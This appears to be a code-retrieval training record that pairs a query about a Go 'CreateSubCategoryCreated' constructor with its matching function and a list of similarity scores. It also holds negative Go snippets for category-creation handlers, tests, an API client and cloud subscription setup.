[ "0.7573695", "0.7172021", "0.63159454", "0.6203084", "0.60634434", "0.6045212", "0.6020982", "0.6007781", "0.5971997", "0.59656334", "0.5953286", "0.5938713", "0.5897168", "0.5880866", "0.58364844", "0.58214897", "0.5801138", "0.57809526", "0.57665086", "0.57444215", "0.57327884", "0.5721069", "0.5715561", "0.57134086", "0.5695288", "0.56844544", "0.56839544", "0.56517094", "0.56437796", "0.55917585", "0.55902314", "0.5584221", "0.5574991", "0.55737585", "0.55578744", "0.55523264", "0.5552302", "0.554375", "0.55396485", "0.55322224", "0.5527651", "0.552178", "0.5504103", "0.54979545", "0.54786086", "0.54785466", "0.54780024", "0.5460566", "0.54485387", "0.5441648", "0.54254013", "0.541719", "0.5398832", "0.5391469", "0.53851545", "0.53827375", "0.53771174", "0.5376893", "0.5376313", "0.5375034", "0.5371987", "0.53649", "0.5360767", "0.5356569", "0.53544074", "0.5352351", "0.5347248", "0.5347248", "0.53335047", "0.5326729", "0.53209084", "0.5320804", "0.53166956", "0.53100353", "0.5310019", "0.5309738", "0.5308318", "0.5305428", "0.5303806", "0.5299591", "0.52940965", "0.5288566", "0.52860135", "0.52860135", "0.52827305", "0.5279906", "0.52776814", "0.52776814", "0.52703124", "0.5268533", "0.5267831", "0.52677095", "0.52668566", "0.52666867", "0.5261693", "0.5258446", "0.52573913", "0.52561396", "0.52539784", "0.525133" ]
0.7300219
1
NewCreateSubCategoryCreated creates CreateSubCategoryCreated with default headers values
func NewCreateSubCategoryCreated() *CreateSubCategoryCreated { return &CreateSubCategoryCreated{} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewSubCategoryTemplate()(*SubCategoryTemplate) {\n m := &SubCategoryTemplate{\n FilePlanDescriptorTemplate: *NewFilePlanDescriptorTemplate(),\n }\n return m\n}", "func CreateCategory (w http.ResponseWriter, r *http.Request) {\n\tvar newCategory Category\n\n\t//get the information containing in request's body\n\t//or report an error\n\treqBody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tfmt.Fprintf(w, \"Kindly enter data with the category name and description only in order to update\")\n\t\tlog.Fatal(err.Error())\n\t}\n\n\t//generate unique categoryID\n\tnewCategory.CategoryID = xid.New().String()\n\t//unmarshal the information from JSON into the Category instance\n\t//or report an error\n\tif err = json.Unmarshal(reqBody, &newCategory); err != nil {\n\t\tlog.Printf(\"Body parse error, %v\", err.Error())\n\t\tw.WriteHeader(400)\n\t\treturn\n\t}\n\n\t//CategoryName is required field\n\tif len(newCategory.CategoryName) == 0 {\n\t\tw.WriteHeader(422)\n\t\tfmt.Fprintf(w, \"Kindly enter data with the category name in order to create new category\")\n\t\treturn\n\t}\n\n\t//append the new category to the slice\n\tCategories = append(Categories, newCategory)\n\tw.WriteHeader(http.StatusCreated)\n\n\t//return the category in response\n\t//or report an error\n\tif err = json.NewEncoder(w).Encode(newCategory); err != nil {\n\t\tlog.Printf(err.Error())\n\t\tw.WriteHeader(500)\n\t\treturn\n\t}\n}", "func (w *ServerInterfaceWrapper) CreateCategory(ctx echo.Context) error {\n\tvar err error\n\n\t// Invoke the callback with all the unmarshalled arguments\n\terr = w.Handler.CreateCategory(ctx)\n\treturn err\n}", "func CreateCategory(w http.ResponseWriter, req *http.Request) {\n\t// esta variable es el body de categoria, como todos los campos que tenga\n\tvar body domain.Category\n\n\t// comprueba que lo que le hemos pasado tiene los campos que corresponde\n\tif err := parseBody(req, &body); err != nil {\n\t\trespondWithError(w, http.StatusBadRequest, err.Error())\n\t\treturn\n\t}\n\t_, err := domain.InsertCaterogy(body)\n\tif err != nil {\n\t\tbadRequest(w, err.Error())\n\t\treturn\n\t}\n\n\trespondWithJSON(w, http.StatusOK, body)\n}", "func (_Mcapscontroller *McapscontrollerTransactor) CreateCategory(opts *bind.TransactOpts, metadataHash [32]byte) (*types.Transaction, error) {\n\treturn _Mcapscontroller.contract.Transact(opts, \"createCategory\", metadataHash)\n}", "func (c *SubresourceClient) Create(namespace string, templateValues interface{}) (e error) {\n\tif c.Error != \"\" {\n\t\te = fmt.Errorf(c.Error)\n\t}\n\treturn\n}", "func CategoriesCreatePOST(c *gin.Context) {\n\tcategory := models.Category{}\n\tcategory.Name = c.PostForm(\"name\")\n\tcategory.Intro = c.PostForm(\"intro\")\n\tcategory.Content = c.PostForm(\"content\")\n\tcategory.Title = c.PostForm(\"title\")\n\tcategory.Description = c.PostForm(\"description\")\n\tcategory.Type = c.PostForm(\"type\")\n\tfile, _ := c.FormFile(\"image\")\n\tif file != nil {\n\t\tif _, err := os.Stat(\"public/upload/\" + category.Type); os.IsNotExist(err) {\n\t\t\tfmt.Println(\"create folder\")\n\t\t\tos.Mkdir(\"public/upload/\"+category.Type, 0755)\n\t\t}\n\t\tc.SaveUploadedFile(file, \"public/upload/\"+category.Type)\n\n\t\tcategory.Image = file.Filename\n\t}\n\tc.JSON(http.StatusBadRequest, gin.H{\"error\": category})\n}", "func NewCreateSubCategoryBadRequest() *CreateSubCategoryBadRequest {\n\treturn &CreateSubCategoryBadRequest{}\n}", "func (o *CreateSubCategoryCreated) WithPayload(payload *models.SubCategory) *CreateSubCategoryCreated {\n\to.Payload = payload\n\treturn o\n}", "func (_Mcapscontroller *McapscontrollerSession) CreateCategory(metadataHash [32]byte) (*types.Transaction, error) {\n\treturn _Mcapscontroller.Contract.CreateCategory(&_Mcapscontroller.TransactOpts, metadataHash)\n}", "func (_Mcapscontroller *McapscontrollerTransactorSession) CreateCategory(metadataHash [32]byte) (*types.Transaction, error) {\n\treturn _Mcapscontroller.Contract.CreateCategory(&_Mcapscontroller.TransactOpts, metadataHash)\n}", "func TestCreateCategoryEmptyBody (t *testing.T) {\n\t//initial length of []Categories\n\tinitialLen := len(Categories)\n\t//empty body\n\trequestBody := &Category{}\n\tjsonCategory, _ := json.Marshal(requestBody)\n\treq, err := http.NewRequest(\"POST\", \"/categories/new\", bytes.NewBuffer(jsonCategory))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trr := httptest.NewRecorder()\n\thandler := http.HandlerFunc(CreateCategory)\n\n\thandler.ServeHTTP(rr, req)\n\n\tassert.Equal(t, 422, rr.Code, \"Unprocessable Entity response is expected\")\n\t//the length of []Categories should not change after trying to create new empty category\n\tassert.Equal(t, initialLen, len(Categories), \"Expected length to stay the same after adding empty category name\")\n}", "func CreateSubCategoryTemplateFromDiscriminatorValue(parseNode i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.Parsable, error) {\n return NewSubCategoryTemplate(), nil\n}", "func TestCreateCategory(t *testing.T) {\n\t//initial length of []Categories\n\tinitialLen := len(Categories)\n\t//parameters passed to request body\n\trequestBody := &Category{\n\t\tCategoryName: \t\t\"Super Cool Category\",\n\t\tCategoryDescription: \"Brand new cool Category\",\n\t}\n\tjsonCategory, _ := json.Marshal(requestBody)\n\t//Create a request to pass to the handler with request body as a third parameter\n\treq, err := http.NewRequest(\"POST\", \"/categories/new\", bytes.NewBuffer(jsonCategory))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trr := httptest.NewRecorder()\n\thandler := http.HandlerFunc(CreateCategory)\n\n\thandler.ServeHTTP(rr, req)\n\n\tassert.Equal(t, 201, rr.Code, \"Created response is expected\")\n\t//the length of []Categories should increase after creating new category\n\tassert.NotEqual(t, initialLen, len(Categories), \"Expected length to increase after creating new Category\")\n}", "func (service *Service) CreateCategory(request *restful.Request, response *restful.Response) {\n\tvar req models.CategoryRequest\n\tif err := request.ReadEntity(&req); err != nil {\n\t\trespondErr(response, http.StatusBadRequest, messageBadRequest,\n\t\t\t\"unable parse request body\")\n\n\t\tlogrus.WithFields(logrus.Fields{\"module\": \"service\", \"resp\": http.StatusBadRequest}).\n\t\t\tError(\"Unable to parse request body:\", err)\n\n\t\treturn\n\t}\n\n\tnewUUID, err := uuid.NewRandom()\n\tif err != nil {\n\t\trespondErr(response, http.StatusInternalServerError, messageServerError,\n\t\t\t\"unable to create uuid\")\n\n\t\tlogrus.WithFields(logrus.Fields{\"module\": \"service\", \"resp\": http.StatusInternalServerError}).\n\t\t\tError(\"Unable to create uuid:\", err)\n\n\t\treturn\n\t}\n\n\tcategory := models.Category{\n\t\tCategoryID: newUUID.String(),\n\t\tName: req.Name,\n\t\tImage: req.Image,\n\t}\n\n\tcreatedCategory, err := service.server.CreateCategory(category)\n\tif err != nil {\n\t\trespondErr(response, http.StatusInternalServerError, messageDatabaseError,\n\t\t\t\"unable to create category\")\n\n\t\tlogrus.WithFields(logrus.Fields{\"module\": \"service\", \"resp\": http.StatusInternalServerError}).\n\t\t\tError(\"Unable to create category:\", err)\n\n\t\treturn\n\t}\n\n\tresult := &models.CreateCategoryResponse{\n\t\tResult: *createdCategory,\n\t}\n\n\twriteResponse(response, http.StatusCreated, result)\n}", "func SubCreate(w http.ResponseWriter, r *http.Request) {\n\n\t// Init output\n\toutput := []byte(\"\")\n\n\t// Add content type header to the response\n\tcontentType := \"application/json\"\n\tcharset := \"utf-8\"\n\tw.Header().Add(\"Content-Type\", fmt.Sprintf(\"%s; charset=%s\", contentType, charset))\n\n\t// Grab url path variables\n\turlVars := mux.Vars(r)\n\n\t// Grab context references\n\trefStr := gorillaContext.Get(r, \"str\").(stores.Store)\n\trefBrk := gorillaContext.Get(r, \"brk\").(brokers.Broker)\n\tprojectUUID := gorillaContext.Get(r, \"auth_project_uuid\").(string)\n\n\t// Read POST JSON body\n\tbody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\terr := APIErrorInvalidRequestBody()\n\t\trespondErr(w, err)\n\t\treturn\n\t}\n\n\t// Parse pull options\n\tpostBody, err := subscriptions.GetFromJSON(body)\n\tif err != nil {\n\t\terr := APIErrorInvalidArgument(\"Subscription\")\n\t\trespondErr(w, err)\n\t\tlog.Error(string(body[:]))\n\t\treturn\n\t}\n\n\ttProject, tName, err := subscriptions.ExtractFullTopicRef(postBody.FullTopic)\n\n\tif err != nil {\n\t\terr := APIErrorInvalidName(\"Topic\")\n\t\trespondErr(w, err)\n\t\treturn\n\t}\n\n\tif topics.HasTopic(projectUUID, tName, refStr) == false {\n\t\terr := APIErrorNotFound(\"Topic\")\n\t\trespondErr(w, err)\n\t\treturn\n\t}\n\n\t// Get current topic offset\n\ttProjectUUID := projects.GetUUIDByName(tProject, refStr)\n\tfullTopic := tProjectUUID + \".\" + tName\n\tcurOff := refBrk.GetMaxOffset(fullTopic)\n\n\tpushEnd := \"\"\n\trPolicy := \"\"\n\trPeriod := 0\n\tmaxMessages := int64(1)\n\n\t//pushWorker := auth.User{}\n\tverifyHash := \"\"\n\n\tif postBody.PushCfg != (subscriptions.PushConfig{}) {\n\n\t\t// check the state of the push functionality\n\t\tpwToken := gorillaContext.Get(r, \"push_worker_token\").(string)\n\t\tpushEnabled := gorillaContext.Get(r, \"push_enabled\").(bool)\n\n\t\tif !pushEnabled {\n\t\t\terr := APIErrorPushConflict()\n\t\t\trespondErr(w, err)\n\t\t\treturn\n\t\t}\n\n\t\t_, err = auth.GetPushWorker(pwToken, refStr)\n\t\tif err != nil {\n\t\t\terr := APIErrInternalPush()\n\t\t\trespondErr(w, err)\n\t\t\treturn\n\t\t}\n\n\t\tpushEnd = postBody.PushCfg.Pend\n\t\t// Check if push endpoint is not a valid https:// endpoint\n\t\tif !(isValidHTTPS(pushEnd)) {\n\t\t\terr := APIErrorInvalidData(\"Push endpoint should be addressed by a valid https url\")\n\t\t\trespondErr(w, err)\n\t\t\treturn\n\t\t}\n\t\trPolicy = postBody.PushCfg.RetPol.PolicyType\n\t\trPeriod = postBody.PushCfg.RetPol.Period\n\t\tmaxMessages = postBody.PushCfg.MaxMessages\n\n\t\tif rPolicy == \"\" {\n\t\t\trPolicy = subscriptions.LinearRetryPolicyType\n\t\t}\n\n\t\tif maxMessages == 0 {\n\t\t\tmaxMessages = int64(1)\n\t\t}\n\n\t\tif rPeriod <= 0 {\n\t\t\trPeriod = 3000\n\t\t}\n\n\t\tif !subscriptions.IsRetryPolicySupported(rPolicy) {\n\t\t\terr := APIErrorInvalidData(subscriptions.UnSupportedRetryPolicyError)\n\t\t\trespondErr(w, err)\n\t\t\treturn\n\t\t}\n\n\t\tverifyHash, err = auth.GenToken()\n\t\tif err != nil {\n\t\t\tlog.Errorf(\"Could not generate verification hash for subscription %v, %v\", urlVars[\"subscription\"], err.Error())\n\t\t\terr := APIErrGenericInternal(\"Could not generate verification hash\")\n\t\t\trespondErr(w, err)\n\t\t\treturn\n\t\t}\n\n\t}\n\n\t// Get Result Object\n\tres, err := subscriptions.CreateSub(projectUUID, urlVars[\"subscription\"], tName, pushEnd, curOff, maxMessages, postBody.Ack, rPolicy, rPeriod, verifyHash, false, refStr)\n\n\tif err != nil {\n\t\tif err.Error() == \"exists\" {\n\t\t\terr := APIErrorConflict(\"Subscription\")\n\t\t\trespondErr(w, err)\n\t\t\treturn\n\t\t}\n\t\terr := APIErrGenericInternal(err.Error())\n\t\trespondErr(w, err)\n\t\treturn\n\t}\n\n\t// Output result to JSON\n\tresJSON, err := res.ExportJSON()\n\tif err != nil {\n\t\terr := APIErrExportJSON()\n\t\trespondErr(w, err)\n\t\treturn\n\t}\n\n\t// Write response\n\toutput = []byte(resJSON)\n\trespondOK(w, output)\n\n}", "func createParentChildWorkItemLinkType(name string, categoryID, spaceID uuid.UUID) *app.CreateWorkItemLinkTypePayload {\n\tdescription := \"Specify that one bug blocks another one.\"\n\tlt := link.WorkItemLinkType{\n\t\tName: name,\n\t\tDescription: &description,\n\t\tTopology: link.TopologyTree,\n\t\tForwardName: \"parent of\",\n\t\tReverseName: \"child of\",\n\t\tLinkCategoryID: categoryID,\n\t\tSpaceID: spaceID,\n\t}\n\treqLong := &http.Request{Host: \"api.service.domain.org\"}\n\tpayload := ConvertWorkItemLinkTypeFromModel(reqLong, lt)\n\t// The create payload is required during creation. Simply copy data over.\n\treturn &app.CreateWorkItemLinkTypePayload{\n\t\tData: payload.Data,\n\t}\n}", "func (d *DestinationClient) CreateSubaccountCertificate(cert Certificate) error {\n\n\tvar errResponse ErrorMessage\n\n\tresponse, err := d.restyClient.R().\n\t\tSetBody(cert).\n\t\tSetError(&errResponse).\n\t\tPost(\"/subaccountCertificates\")\n\n\tif err != nil {\n\t\treturn err\n\t}\n\tif response.StatusCode() != 201 {\n\t\terrResponse.statusCode = response.StatusCode()\n\t\treturn errResponse\n\t}\n\treturn nil\n}", "func (z *Category) Create(tx Querier) error {\n\treturn nil\n}", "func MythicRPCTaskCreateSubtask(input MythicRPCTaskCreateSubtaskMessage) MythicRPCTaskCreateSubtaskMessageResponse {\n\tresponse := MythicRPCTaskCreateSubtaskMessageResponse{\n\t\tSuccess: false,\n\t}\n\ttaskingLocation := \"mythic_rpc\"\n\tcreateTaskInput := CreateTaskInput{\n\t\tParentTaskID: &input.TaskID,\n\t\tCommandName: input.CommandName,\n\t\tParams: input.Params,\n\t\tToken: input.Token,\n\t\tParameterGroupName: input.ParameterGroupName,\n\t\tSubtaskCallbackFunction: input.SubtaskCallbackFunction,\n\t\tTaskingLocation: &taskingLocation,\n\t}\n\ttask := databaseStructs.Task{}\n\toperatorOperation := databaseStructs.Operatoroperation{}\n\tif err := database.DB.Get(&task, `SELECT \n\tcallback.id \"callback.id\",\n\tcallback.display_id \"callback.display_id\",\n\tcallback.operation_id \"callback.operation_id\",\n\toperator.id \"operator.id\",\n\toperator.admin \"operator.admin\" \n\tFROM task\n\tJOIN callback ON task.callback_id = callback.id \n\tJOIN operator ON task.operator_id = operator.id\n\tWHERE task.id=$1`, input.TaskID); err != nil {\n\t\tresponse.Error = err.Error()\n\t\tlogging.LogError(err, \"Failed to fetch task/callback information when creating subtask\")\n\t\treturn response\n\t} else if err := database.DB.Get(&operatorOperation, `SELECT\n\tbase_disabled_commands_id\n\tFROM operatoroperation\n\tWHERE operator_id = $1 AND operation_id = $2\n\t`, task.Operator.ID, task.Callback.OperationID); err != nil {\n\t\tlogging.LogError(err, \"Failed to get operation information when creating subtask\")\n\t\tresponse.Error = err.Error()\n\t\treturn response\n\t} else {\n\t\tcreateTaskInput.IsOperatorAdmin = task.Operator.Admin\n\t\tcreateTaskInput.CallbackDisplayID = task.Callback.DisplayID\n\t\tcreateTaskInput.CurrentOperationID = task.Callback.OperationID\n\t\tif operatorOperation.BaseDisabledCommandsID.Valid {\n\t\t\tbaseDisabledCommandsID := int(operatorOperation.BaseDisabledCommandsID.Int64)\n\t\t\tcreateTaskInput.DisabledCommandID = &baseDisabledCommandsID\n\t\t}\n\t\tcreateTaskInput.OperatorID = task.Operator.ID\n\t\t// create a subtask of this task\n\t\tcreationResponse := CreateTask(createTaskInput)\n\t\tif creationResponse.Status == \"success\" {\n\t\t\tresponse.Success = true\n\t\t\tresponse.TaskID = creationResponse.TaskID\n\t\t} else {\n\t\t\tresponse.Error = creationResponse.Error\n\t\t}\n\t\treturn response\n\t}\n\n}", "func CreateCompanyBranchHyCompanybranchCreated(t goatest.TInterface, ctx context.Context, service *goa.Service, ctrl app.HyCompanybranchController, id int, payload *app.CreateCompanyBranchHyCompanybranchPayload) http.ResponseWriter {\n\t// Setup service\n\tvar (\n\t\tlogBuf bytes.Buffer\n\n\t\trespSetter goatest.ResponseSetterFunc = func(r interface{}) {}\n\t)\n\tif service == nil {\n\t\tservice = goatest.Service(&logBuf, respSetter)\n\t} else {\n\t\tlogger := log.New(&logBuf, \"\", log.Ltime)\n\t\tservice.WithLogger(goa.NewLogger(logger))\n\t\tnewEncoder := func(io.Writer) goa.Encoder { return respSetter }\n\t\tservice.Encoder = goa.NewHTTPEncoder() // Make sure the code ends up using this decoder\n\t\tservice.Encoder.Register(newEncoder, \"*/*\")\n\t}\n\n\t// Validate payload\n\terr := payload.Validate()\n\tif err != nil {\n\t\te, ok := err.(goa.ServiceError)\n\t\tif !ok {\n\t\t\tpanic(err) // bug\n\t\t}\n\t\tt.Errorf(\"unexpected payload validation error: %+v\", e)\n\t\treturn nil\n\t}\n\n\t// Setup request context\n\trw := httptest.NewRecorder()\n\tu := &url.URL{\n\t\tPath: fmt.Sprintf(\"/api/company/branch/%v\", id),\n\t}\n\treq, _err := http.NewRequest(\"POST\", u.String(), nil)\n\tif _err != nil {\n\t\tpanic(\"invalid test \" + _err.Error()) // bug\n\t}\n\tprms := url.Values{}\n\tprms[\"ID\"] = []string{fmt.Sprintf(\"%v\", id)}\n\tif ctx == nil {\n\t\tctx = context.Background()\n\t}\n\tgoaCtx := goa.NewContext(goa.WithAction(ctx, \"HyCompanybranchTest\"), rw, req, prms)\n\tcreateCompanyBranchCtx, __err := app.NewCreateCompanyBranchHyCompanybranchContext(goaCtx, req, service)\n\tif __err != nil {\n\t\t_e, _ok := __err.(goa.ServiceError)\n\t\tif !_ok {\n\t\t\tpanic(\"invalid test data \" + __err.Error()) // bug\n\t\t}\n\t\tt.Errorf(\"unexpected parameter validation error: %+v\", _e)\n\t\treturn nil\n\t}\n\tcreateCompanyBranchCtx.Payload = payload\n\n\t// Perform action\n\t__err = ctrl.CreateCompanyBranch(createCompanyBranchCtx)\n\n\t// Validate response\n\tif __err != nil {\n\t\tt.Fatalf(\"controller returned %+v, logs:\\n%s\", __err, logBuf.String())\n\t}\n\tif rw.Code != 201 {\n\t\tt.Errorf(\"invalid response status code: got %+v, expected 201\", rw.Code)\n\t}\n\n\t// Return results\n\treturn rw\n}", "func (d UserData) CreateCategories(related m.PartnerCategoryData) m.UserData {\n\td.ModelData.Create(models.NewFieldName(\"Categories\", \"category_ids\"), related.Underlying())\n\treturn d\n}", "func CategoryNew(c *gin.Context) {\n\th := helpers.DefaultH(c)\n\th[\"Title\"] = \"New Category\"\n\th[\"Active\"] = \"categories\"\n\tsession := sessions.Default(c)\n\th[\"Flash\"] = session.Flashes()\n\tsession.Save()\n\n\tc.HTML(http.StatusOK, \"admin/categories/form\", h)\n}", "func CreateSubCgroupPath(group, prefix string) (string, error) {\n\tbase := path.Join(basePath, group, prefix)\n\tEnsureDirExists(base)\n\treturn os.MkdirTemp(base, \"\")\n}", "func CreateSubSpace(t *testing.T, awaitilities wait.Awaitilities, opts ...SpaceOption) *toolchainv1alpha1.Space {\n\tspace := NewSpace(t, awaitilities, opts...)\n\n\terr := awaitilities.Host().CreateWithCleanup(t, space)\n\trequire.NoError(t, err)\n\n\treturn space\n}", "func (d *Domain) createSubType(newType *Type, protoProp *ProtoProperty) {\n\t// create the property\n\tnewProp := NewTypeProperties(protoProp)\n\t// create the new sub type\n\tsubType := NewSubType(newProp, protoProp)\n\n\t// recursive to add props to this type\n\trecursiveProps := protoProp.Properties\n\t// array type requires the protoType properties.\n\tif subType.IsArray() {\n\t\trecursiveProps = subType.protoType.Properties\n\t}\n\td.handleType(subType, recursiveProps)\n\td.SubTypes = append(d.SubTypes, subType)\n\t// update ref from property to new sub type\n\trefName := d.Domain + \"Sub\" + strings.Title(protoProp.Name)\n\tnewProp.GoType = refName\n\tnewProp.IsRef = true\n\tnewType.Properties = append(newType.Properties, newProp)\n}", "func (a *SubAccountApiService) CreateSubAccounts(ctx context.Context, subAccount SubAccount) (SubAccount, *http.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = http.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue SubAccount\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/sub_accounts\"\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = &subAccount\n\tif ctx == nil {\n\t\tctx = context.Background()\n\t}\n\tif ctx.Value(ContextGateAPIV4) == nil {\n\t\t// for compatibility, set configuration key and secret to context if ContextGateAPIV4 value is not present\n\t\tctx = context.WithValue(ctx, ContextGateAPIV4, GateAPIV4{\n\t\t\tKey: a.client.cfg.Key,\n\t\t\tSecret: a.client.cfg.Secret,\n\t\t})\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status + \", \" + string(localVarBody),\n\t\t}\n\t\tvar gateErr GateAPIError\n\t\tif e := a.client.decode(&gateErr, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\")); e == nil && gateErr.Label != \"\" {\n\t\t\tgateErr.APIError = newErr\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, gateErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func createNewUnstructured(\n\tclientHubDynamic dynamic.Interface,\n\tgvr schema.GroupVersionResource,\n\tobj *unstructured.Unstructured,\n\tname, namespace string,\n) {\n\tklog.V(5).Infof(\"Creation Unstructured of %s %s/%s\", gvr, name, namespace)\n\tns := clientHubDynamic.Resource(gvr).Namespace(namespace)\n\tklog.V(5).Infof(\"ns client created for %s %s/%s created\", gvr, name, namespace)\n\tExpect(ns.Create(context.TODO(), obj, metav1.CreateOptions{})).NotTo(BeNil())\n\tklog.V(5).Infof(\"Check if Unstructured %s %s/%s created\", gvr, name, namespace)\n\tExpect(ns.Get(context.TODO(), name, metav1.GetOptions{})).NotTo(BeNil())\n\tklog.V(5).Infof(\"Unstructured %s %s/%s created\", gvr, name, namespace)\n}", "func CreateCategoriesPath() string {\n\n\treturn fmt.Sprintf(\"/categories\")\n}", "func (scope *Scope) CreateSubScope() *Scope {\n\treturn CreateScope(scope)\n}", "func (s *Stream) CreateSubStream(headers http.Header, fin bool) (*Stream, error) {\n\treturn s.conn.CreateStream(headers, s, fin)\n}", "func (ggSession *GreengrassSession) CreateSub(source, target, subject string) error {\n\tsourceArn := ggSession.mapSubToArn(source)\n\ttargetArn := ggSession.mapSubToArn(target)\n\n\tnewUUID, err := uuid.NewV4()\n\tif err != nil {\n\t\treturn err\n\t}\n\tuuidString := newUUID.String()\n\n\t// Check if we need to create the initial version\n\tif ggSession.config.SubscriptionDefinition.ID == \"\" {\n\t\tnewSubscription, err := ggSession.greengrass.CreateSubscriptionDefinition(&greengrass.CreateSubscriptionDefinitionInput{\n\t\t\tInitialVersion: &greengrass.SubscriptionDefinitionVersion{\n\t\t\t\tSubscriptions: []*greengrass.Subscription{\n\t\t\t\t\t&greengrass.Subscription{\n\t\t\t\t\t\tSource: &sourceArn,\n\t\t\t\t\t\tTarget: &targetArn,\n\t\t\t\t\t\tSubject: &subject,\n\t\t\t\t\t\tId: &uuidString,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t})\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfmt.Printf(\"Created new subscription\\n\")\n\t\tggSession.config.SubscriptionDefinition.ID = *newSubscription.Id\n\t\tggSession.config.SubscriptionDefinition.VersionArn = *newSubscription.LatestVersionArn\n\n\t\tggSession.updateGroup()\n\n\t\treturn nil\n\t}\n\n\t// Add subscription to existing\n\tsubscription, _ := ggSession.greengrass.GetSubscriptionDefinition(&greengrass.GetSubscriptionDefinitionInput{\n\t\tSubscriptionDefinitionId: &ggSession.config.SubscriptionDefinition.ID,\n\t})\n\n\tsubscriptionVersion, _ := ggSession.greengrass.GetSubscriptionDefinitionVersion(&greengrass.GetSubscriptionDefinitionVersionInput{\n\t\tSubscriptionDefinitionId: subscription.Id,\n\t\tSubscriptionDefinitionVersionId: subscription.LatestVersion,\n\t})\n\tsubscriptions := subscriptionVersion.Definition.Subscriptions\n\n\tsubscriptions = append(subscriptions, &greengrass.Subscription{\n\t\tSource: &sourceArn,\n\t\tTarget: &targetArn,\n\t\tSubject: &subject,\n\t\tId: &uuidString,\n\t})\n\n\toutput, err := ggSession.greengrass.CreateSubscriptionDefinitionVersion(&greengrass.CreateSubscriptionDefinitionVersionInput{\n\t\tSubscriptionDefinitionId: subscription.Id,\n\t\tSubscriptions: subscriptions,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tggSession.config.SubscriptionDefinition.VersionArn = *output.Arn\n\tfmt.Printf(\"Updated subscription\\n\")\n\n\tggSession.updateGroup()\n\n\treturn nil\n}", "func createNewSecHubJob(context *Context) {\n\tfmt.Printf(\"- Creating new sechub job\\n\")\n\tresponse := sendWithDefaultHeader(\"POST\", buildCreateNewSecHubJobAPICall(context), context)\n\n\tdata, err := ioutil.ReadAll(response.Body)\n\tHandleError(err)\n\n\tvar result jobScheduleResult\n\tjsonErr := json.Unmarshal(data, &result)\n\tHandleError(jsonErr)\n\n\tcontext.config.secHubJobUUID = result.JobId\n}", "func CreateSubCgroupPath(group, prefix string) (string, error) {\n\tbase := path.Join(basePath, group, prefix)\n\tEnsureDirExists(base)\n\treturn ioutil.TempDir(base, \"\")\n}", "func PostCoursesCourseSegmentsSegmentCategories(w http.ResponseWriter, r *http.Request) {\n\n\tvar response string\n\tuser := r.Header.Get(\"X-User\")\n\tresF := database.GetFacultyUser(user)\n\tif resF.ID == 0 {\n\t\tresponse = \"Access denied.\"\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t} else {\n\t\tresJsonString, resJsonCode := database.CheckJSONContent(w, r)\n\t\tif resJsonCode != http.StatusOK {\n\t\t\tw.WriteHeader(resJsonCode)\n\t\t\tresponse = resJsonString\n\t\t} else {\n\t\t\tdec := json.NewDecoder(r.Body)\n\t\t\tdec.DisallowUnknownFields()\n\t\t\tvar newCategory database.SegmentCategory\n\t\t\terr := dec.Decode(&newCategory)\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t}\n\t\t\tvars := mux.Vars(r)\n\t\t\tsegmentCode := vars[\"segment\"]\n\t\t\tnewCategory.SegmentID = scripts.StringToUint(segmentCode)\n\t\t\tresCode, resString := database.ValidateNewCategory(newCategory)\n\t\t\tif resCode != 